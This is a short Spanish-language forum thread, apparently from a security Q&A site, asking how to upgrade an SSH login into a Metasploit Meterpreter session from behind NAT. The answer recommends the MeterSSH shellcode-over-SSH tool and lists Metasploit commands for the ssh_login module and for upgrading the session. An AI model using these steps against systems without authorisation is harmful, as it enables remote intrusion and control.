Meterpreter en conexión ssh

0

Estoy detrás de NAT.

Puedo iniciar sesión en ssh en el objetivo.

¿Cómo usar metasploit/ enviar a meterpretertravés de esa conexión SSH?

Lo intenté shell_to_meterpreterpero falló porque no puedo abrir mi puerto para que se conecte TCP inverso.

Ambas máquinas están en Linux.

vfjpl
fuente

Respuestas:

1

Ventanas:

Puedes intentar usar MeterSSH .

MeterSSH es una manera fácil de inyectar código shell nativo en la memoria y canalizar cualquier cosa sobre SSH a la máquina atacante a través de un túnel SSH y todo autocontenido en un solo archivo Python.

Linux:

Puede usar el módulo auxiliar de metasploit llamado ssh_login:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit

Ahora convierta el comando shell en meterpreter shell mediante el siguiente comando

session –u 1
alexfrancow
fuente
Olvidé agregar Ambas máquinas están en Linux.
vfjpl